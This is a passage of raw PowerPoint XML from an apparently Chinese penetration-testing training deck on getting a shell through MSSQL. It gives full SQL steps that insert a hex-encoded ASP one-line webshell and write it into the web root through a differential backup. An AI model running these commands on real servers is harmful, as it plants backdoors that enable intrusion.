              <a:t>- HTTP 500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>错误不是自定义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>- WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和数据库在一块。还有的就是数据库中不能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>号之类的，不然也是不成功的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据量不能太大</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marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：差异备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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容错率相对较差，通常利用存储过程与日志备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>更为快捷。</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2608057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a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7956BA4-BB21-4982-B11F-09A2D7BE5396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="566308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a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379191" indent="-379191">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>条件</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marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径已知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>差异备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tips: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>差异备份成功率较低，条件相对苛刻，通常利用存储过程与日志备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>更为快捷。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1E06C9-04D5-4126-BA38-4DCAA555A5D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422399" y="3308236"/>
            <a:ext cx="9347200" cy="1703474"/>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ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>use test;//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>选中库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>backup database test to disk = 'c:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\mssql1.bak’;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0"/>
              <a:t> 手动备份一次</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>create table test..test1(a image);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>新建临时表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>insert into test..test1(a) values (0x3C25657865637574652872657175657374282261222929253EDA);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>插入一句话木马到表中，注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>进制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>backup database test to disk = 'c:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\shell1.asp' with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>differential,format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>进行差异备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Drop table test..test1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
